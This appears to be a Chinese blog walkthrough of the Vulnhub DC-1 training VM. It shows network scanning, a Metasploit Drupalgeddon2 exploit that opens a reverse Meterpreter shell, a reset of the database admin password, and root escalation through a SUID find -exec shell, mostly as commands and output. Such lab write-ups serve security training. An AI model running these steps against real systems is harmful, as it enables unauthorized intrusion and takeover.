《Vulnhub通关手册》——01 DC-1

​背景概述:

下载地址为:https://www.vulnhub.com/entry/dc-1-1,292/

本次靶机IP为192.168.2.11

技术要点:

  • drupal7漏洞利用
  • SUID的find命令提权

1. 信息收集

1.1 扫描目标主机IP

使用arp-scan进行局域网扫描,使用命令arp-scan -l,扫描结果如下:

└─# arp-scan -l            
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 192.168.2.253
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.2.2     ec:3c:bb:ae:b7:45       Huawei Device Co., Ltd.
192.168.2.11    00:0c:29:a7:2b:2f       VMware, Inc.

根据MAC地址可知靶机的IP地址为192.168.2.11

1.2 扫描目标主机开放端口

使用nmap进行端口扫描,使用命令nmap -sS -Pn -p 1-65535 192.168.2.11,扫描结果如下:

└─# nmap -sS -Pn -p 1-65535 192.168.2.11           //扫描开放端口
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-09 09:37 CST
Stats: 0:00:01 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 88.53% done; ETC: 09:37 (0:00:01 remaining)
Nmap scan report for 192.168.2.11
Host is up (0.00080s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
37297/tcp open  unknown
MAC Address: 00:0C:29:A7:2B:2F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 9.27 seconds

根据扫描结果得知,目标主机开放了22、80、111、37297端口。

1.3 指纹识别

  1. 使用御剑WEB指纹识别系统进行站点的指纹识别,添加站点为http://192.168.2.11:1898进行扫描,得出应用指纹为Drupal(水滴)
    但是并未获得CMS的版本信息,因此我们可以使用CMSeek

    来进行版本信息的探测,使用命令python3 cmseek.py -u 192.168.2.11:1898,得出Drupal 7

  2. 使用httprint进行中间件探测,得出目标系统为Apache/2.2.22 (Debian)

2. GetShell

搜集Drupal 7的相关漏洞信息,发现存在CVE-2018-7600 DRUPAL 7.X 版本代码执行,尝试使用msf进行攻击。

└─# msfdb run                     //运行msf
[+] Starting database
                                                  

  Metasploit Park, System Security Interface                                                                                 
  Version 4.0.5, Alpha E                                                                                                     
  Ready...                                                                                                                   
  > access security                                                                                                          
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!                                                                                             
  YOU DIDN'T SAY THE MAGIC WORD!                                                                                             
  YOU DIDN'T SAY THE MAGIC WORD!                                                                                             
  YOU DIDN'T SAY THE MAGIC WORD!                                                                                             
  YOU DIDN'T SAY THE MAGIC WORD!                                                                                             
  YOU DIDN'T SAY THE MAGIC WORD!                                                                                             


       =[ metasploit v6.0.45-dev                          ]
+ -- --=[ 2134 exploits - 1139 auxiliary - 364 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: When in a module, use back to go 
back to the top level prompt

[*] Starting persistent handler(s)...
msf6 > search drupal                         //搜索drupal相关漏洞利用

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution


Interact with a module by name or index. For example info 7, use 7 or use exploit/unix/webapp/php_xmlrpc_eval

msf6 > use exploit/unix/webapp/drupal_drupalgeddon2       //使用相关漏洞利用
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options            //查看参数选项

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path
                                           >'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.2.19     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)


msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.2.11
RHOSTS => 192.168.2.11                           //设置目标主机IP
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RPORT 80
RPORT => 80                      //设置目标主机端口
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run                 //开始攻击

[*] Started reverse TCP handler on 192.168.2.19:4444 
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated.
[*] Sending stage (39282 bytes) to 192.168.2.11
[*] Meterpreter session 1 opened (192.168.2.19:4444 -> 192.168.2.11:56933) at 2021-12-09 17:23:21 +0800

meterpreter > shell                //进入shell界面
Process 3338 created.
Channel 0 created.

获得shell!

3. 提权

  1. 执行shell获取交互式命令,由于我们获取的shell并不是一个具有完整交互的shell,对于已经安装了python的系统,我们可以使用python提供的pty模块,只需要一行脚本就可以创建一个原生的终端。在获得shell界面输入命令python -c 'import pty; pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'    //创建原生终端
www-data@DC-1:/var/www$ 

www-data@DC-1:/var/www$ whoami                   //查看当前权限
whoami
www-data
  1. 输入ls命令查看当前文件夹,发现存在flag1.txt文件。
www-data@DC-1:/var/www$ ls                   //查看当前文件夹
ls
COPYRIGHT.txt       MAINTAINERS.txt  flag1.txt    profiles    web.config
INSTALL.mysql.txt   README.txt       includes     robots.txt  xmlrpc.php
INSTALL.pgsql.txt   UPGRADE.txt      index.php    scripts
INSTALL.sqlite.txt  abc              install.php  sites
INSTALL.txt         authorize.php    misc         themes
LICENSE.txt         cron.php         modules      update.php
www-data@DC-1:/var/www$ cat flag1.txt        //查看flag1.txt文件
cat flag1.txt
Every good CMS needs a config file - and so do you.

flag1.txt文件提示我们需要查看config配置文件。进入/var/www/sites/default目录下,查看settings.php,发现数据库账号为dbuser和密码为R0ck3t

  1. 尝试更改数据库用户admin的密码。在数据库更新管理源密码,加载加密脚本生成密码的hash值php /var/www/scripts/password-hash.sh password,加密脚本位置在网站根目录下的scripts下,生成password的hash值进行替换,使用命令update drupaldb.users set pass =" $ S $DgNSiYzRbilwq18C5.D/pnvrvdoKncm5W xBG7AIDqwFNKDi0TJCL" where name=“admin”;进行密码的替换。登录网站,输入账户名为admin、密码为password。根据flag3提示我们需要使用find命令的-exec参数进行提权。

  2. 利用SUID提权进行提权,发现find命令在调用时会临时升级为root用户,因此可以利用find命令进行提权。提权完成后,进入根目录查看最终的flag值。

www-data@DC-1:/var/www$ find / -user root -perm -4000 -print 2>/dev/null   //查找SUID文件
find / -user root -perm -4000 -print 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs

www-data@DC-1:/var/www$ mkdir abc                   //创建一个文件夹用于使用find命令进行SUID提权

www-data@DC-1:/var/www$ find abc -exec '/bin/sh' \;  //使用find命令进行提权
find abc -exec '/bin/sh' \;
# whoami                                            //查看当前权限
whoami
root
# cd /root                                          //进入到根目录
cd /root
# ls
ls
thefinalflag.txt
# cat thefinalflag.txt                              //查看最终flag
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Merrill He

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值